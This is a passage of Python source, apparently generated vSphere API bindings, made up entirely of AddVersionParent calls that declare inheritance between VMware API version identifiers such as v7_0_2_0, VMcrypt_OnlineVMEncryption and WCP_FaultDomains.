AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version10")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version11")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version12")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.OVF_SINGLEDEPLOY_API")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.v7_0")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version8")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version9")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version6")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version7")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version1")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version4")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version5")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version2")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version3")
AddVersionParent("vim.version.v7_0_2_0", "vmodl.query.version.version4")
AddVersionParent("vim.version.v7_0_2_0", "vmodl.query.version.version3")
AddVersionParent("vim.version.v7_0_2_0", "vmodl.query.version.version2")
AddVersionParent("vim.version.v7_0_2_0", "vmodl.query.version.version1")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.v7_0_2_0", "vmodl.version.version0")
AddVersionParent("vim.version.v7_0_2_0", "vmodl.version.version1")
AddVersionParent("vim.version.v7_0_2_0", "vmodl.version.version2")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.v6_9_1")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.v6_8_7")
AddVersionParent("vim.version.v7_0_2_0", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v7_0_2_0", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version13")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version14")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version15")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version10")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version11")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version12")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.v7_0")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version8")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version9")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version6")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version7")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version1")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version4")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version5")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version2")
AddVersionParent("vim.version.v7_0_2_0", "vim.version.version3")
AddVersionParent("vim.version.pr1803450", "vmodl.query.version.version4")
AddVersionParent("vim.version.pr1803450", "vmodl.query.version.version3")
AddVersionParent("vim.version.pr1803450", "vmodl.query.version.version2")
AddVersionParent("vim.version.pr1803450", "vmodl.query.version.version1")
AddVersionParent("vim.version.pr1803450", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.pr1803450", "vmodl.version.version0")
AddVersionParent("vim.version.pr1803450", "vmodl.version.version1")
AddVersionParent("vim.version.pr1803450", "vmodl.version.version2")
AddVersionParent("vim.version.pr1803450", "vim.version.v6_9_1")
AddVersionParent("vim.version.pr1803450", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.pr1803450", "vim.version.v6_8_7")
AddVersionParent("vim.version.pr1803450", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.pr1803450", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.pr1803450", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.pr1803450", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.pr1803450", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.pr1803450", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.pr1803450", "vim.version.version13")
AddVersionParent("vim.version.pr1803450", "vim.version.version14")
AddVersionParent("vim.version.pr1803450", "vim.version.version15")
AddVersionParent("vim.version.pr1803450", "vim.version.version10")
AddVersionParent("vim.version.pr1803450", "vim.version.version11")
AddVersionParent("vim.version.pr1803450", "vim.version.version12")
AddVersionParent("vim.version.pr1803450", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.pr1803450", "vim.version.pr1803450")
AddVersionParent("vim.version.pr1803450", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.pr1803450", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.pr1803450", "vim.version.v7_0")
AddVersionParent("vim.version.pr1803450", "vim.version.version8")
AddVersionParent("vim.version.pr1803450", "vim.version.version9")
AddVersionParent("vim.version.pr1803450", "vim.version.version6")
AddVersionParent("vim.version.pr1803450", "vim.version.version7")
AddVersionParent("vim.version.pr1803450", "vim.version.version1")
AddVersionParent("vim.version.pr1803450", "vim.version.version4")
AddVersionParent("vim.version.pr1803450", "vim.version.version5")
AddVersionParent("vim.version.pr1803450", "vim.version.version2")
AddVersionParent("vim.version.pr1803450", "vim.version.version3")
AddVersionParent("vim.version.v7_0_2_1", "vmodl.query.version.version4")
AddVersionParent("vim.version.v7_0_2_1", "vmodl.query.version.version3")
AddVersionParent("vim.version.v7_0_2_1", "vmodl.query.version.version2")
AddVersionParent("vim.version.v7_0_2_1", "vmodl.query.version.version1")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.v7_0_2_1", "vmodl.version.version0")
AddVersionParent("vim.version.v7_0_2_1", "vmodl.version.version1")
AddVersionParent("vim.version.v7_0_2_1", "vmodl.version.version2")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.v6_9_1")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.v6_8_7")
AddVersionParent("vim.version.v7_0_2_1", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v7_0_2_1", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version13")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version14")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version15")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version10")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version11")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version12")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.v7_0")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version8")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version9")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version6")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version7")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version1")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version4")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version5")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version2")
AddVersionParent("vim.version.v7_0_2_1", "vim.version.version3")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vmodl.query.version.version4")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vmodl.query.version.version3")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vmodl.query.version.version2")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vmodl.query.version.version1")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vmodl.version.version0")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vmodl.version.version1")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vmodl.version.version2")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.v6_9_1")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.v6_8_7")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version13")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version14")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version15")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version10")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version11")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.VMcrypt_IntegrityProtection")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version12")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.VMcrypt_OnlineVMEncryption")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.v7_0")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version8")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version9")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version6")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version7")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version1")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version4")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version5")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version2")
AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", "vim.version.version3")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vmodl.query.version.version4")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vmodl.query.version.version3")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vmodl.query.version.version2")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vmodl.query.version.version1")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vmodl.version.version0")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vmodl.version.version1")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vmodl.version.version2")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.v6_9_1")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.v6_8_7")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version13")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version14")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version15")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version10")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version11")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version12")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.FT_VBS_SUPPORT")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.v7_0")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version8")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version9")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version6")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version7")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version1")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version4")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version5")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version2")
AddVersionParent("vim.version.FT_VBS_SUPPORT", "vim.version.version3")
AddVersionParent("vim.version.WCP_FaultDomains", "vmodl.query.version.version4")
AddVersionParent("vim.version.WCP_FaultDomains", "vmodl.query.version.version3")
AddVersionParent("vim.version.WCP_FaultDomains", "vmodl.query.version.version2")
AddVersionParent("vim.version.WCP_FaultDomains", "vmodl.query.version.version1")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.WCP_FaultDomains", "vmodl.version.version0")
AddVersionParent("vim.version.WCP_FaultDomains", "vmodl.version.version1")
AddVersionParent("vim.version.WCP_FaultDomains", "vmodl.version.version2")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.v6_9_1")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.v6_8_7")
AddVersionParent("vim.version.WCP_FaultDomains", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.WCP_FaultDomains", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version13")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version14")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version15")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version10")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version11")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version12")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.WCP_FaultDomains")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.v7_0")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version8")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version9")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version6")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version7")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version1")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version4")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version5")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version2")
AddVersionParent("vim.version.WCP_FaultDomains", "vim.version.version3")
AddVersionParent("vim.version.dnd", "vmodl.query.version.version4")
AddVersionParent("vim.version.dnd", "vmodl.query.version.version3")
AddVersionParent("vim.version.dnd", "vmodl.query.version.version2")
AddVersionParent("vim.version.dnd", "vmodl.query.version.version1")
AddVersionParent("vim.version.dnd", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.dnd", "vmodl.version.version0")
AddVersionParent("vim.version.dnd", "vmodl.version.version1")
AddVersionParent("vim.version.dnd", "vmodl.version.version2")
AddVersionParent("vim.version.dnd", "vim.version.v6_9_1")
AddVersionParent("vim.version.dnd", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.dnd", "vim.version.v6_8_7")
AddVersionParent("vim.version.dnd", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.dnd", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.dnd", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.dnd", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.dnd", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.dnd", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.dnd", "vim.version.version13")
AddVersionParent("vim.version.dnd", "vim.version.version14")
AddVersionParent("vim.version.dnd", "vim.version.version15")
AddVersionParent("vim.version.dnd", "vim.version.version10")
AddVersionParent("vim.version.dnd", "vim.version.version11")
AddVersionParent("vim.version.dnd", "vim.version.version12")
AddVersionParent("vim.version.dnd", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.dnd", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.dnd", "vim.version.dnd")
AddVersionParent("vim.version.dnd", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.dnd", "vim.version.v7_0")
AddVersionParent("vim.version.dnd", "vim.version.version8")
AddVersionParent("vim.version.dnd", "vim.version.version9")
AddVersionParent("vim.version.dnd", "vim.version.version6")
AddVersionParent("vim.version.dnd", "vim.version.version7")
AddVersionParent("vim.version.dnd", "vim.version.version1")
AddVersionParent("vim.version.dnd", "vim.version.version4")
AddVersionParent("vim.version.dnd", "vim.version.version5")
AddVersionParent("vim.version.dnd", "vim.version.version2")
AddVersionParent("vim.version.dnd", "vim.version.version3")
AddVersionParent("vim.version.optional_virtual_disks", "vmodl.query.version.version4")
AddVersionParent("vim.version.optional_virtual_disks", "vmodl.query.version.version3")
AddVersionParent("vim.version.optional_virtual_disks", "vmodl.query.version.version2")
AddVersionParent("vim.version.optional_virtual_disks", "vmodl.query.version.version1")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.optional_virtual_disks", "vmodl.version.version0")
AddVersionParent("vim.version.optional_virtual_disks", "vmodl.version.version1")
AddVersionParent("vim.version.optional_virtual_disks", "vmodl.version.version2")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.v6_9_1")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.v6_8_7")
AddVersionParent("vim.version.optional_virtual_disks", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.optional_virtual_disks", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version13")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version14")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version15")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version10")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version11")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version12")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.optional_virtual_disks")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.v7_0")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version8")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version9")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version6")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version7")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version1")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version4")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version5")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version2")
AddVersionParent("vim.version.optional_virtual_disks", "vim.version.version3")
AddVersionParent("vim.version.hwh2_0", "vmodl.query.version.version4")
AddVersionParent("vim.version.hwh2_0", "vmodl.query.version.version3")
AddVersionParent("vim.version.hwh2_0", "vmodl.query.version.version2")
AddVersionParent("vim.version.hwh2_0", "vmodl.query.version.version1")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.hwh2_0", "vmodl.version.version0")
AddVersionParent("vim.version.hwh2_0", "vmodl.version.version1")
AddVersionParent("vim.version.hwh2_0", "vmodl.version.version2")
AddVersionParent("vim.version.hwh2_0", "vim.version.v6_9_1")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.hwh2_0", "vim.version.v6_8_7")
AddVersionParent("vim.version.hwh2_0", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.hwh2_0", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.hwh2_0", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.hwh2_0", "vim.version.version13")
AddVersionParent("vim.version.hwh2_0", "vim.version.version14")
AddVersionParent("vim.version.hwh2_0", "vim.version.version15")
AddVersionParent("vim.version.hwh2_0", "vim.version.version10")
AddVersionParent("vim.version.hwh2_0", "vim.version.version11")
AddVersionParent("vim.version.hwh2_0", "vim.version.version12")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.hwh2_0", "vim.version.hwh2_0")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0")
AddVersionParent("vim.version.hwh2_0", "vim.version.version8")
AddVersionParent("vim.version.hwh2_0", "vim.version.version9")
AddVersionParent("vim.version.hwh2_0", "vim.version.version6")
AddVersionParent("vim.version.hwh2_0", "vim.version.version7")
AddVersionParent("vim.version.hwh2_0", "vim.version.version1")
AddVersionParent("vim.version.hwh2_0", "vim.version.version4")
AddVersionParent("vim.version.hwh2_0", "vim.version.version5")
AddVersionParent("vim.version.hwh2_0", "vim.version.version2")
AddVersionParent("vim.version.hwh2_0", "vim.version.version3")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.query.version.version4")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.query.version.version3")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.query.version.version2")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.query.version.version1")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.version.version0")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.version.version1")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.version.version2")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.v6_9_1")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.v6_8_7")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version13")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version14")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version15")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version10")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version11")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version12")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.v7_0")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version8")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version9")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version6")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version7")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version1")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version4")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version5")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version2")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version3")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.query.version.version4")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.query.version.version3")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.query.version.version2")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.query.version.version1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.version.version0")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.version.version1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.version.version2")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v6_9_1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v6_8_7")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version13")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version14")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version15")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version10")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version11")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version12")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.VM_OP_NOTIFICATION_TO_APP_V1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version8")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version9")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version6")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version7")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version4")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version5")
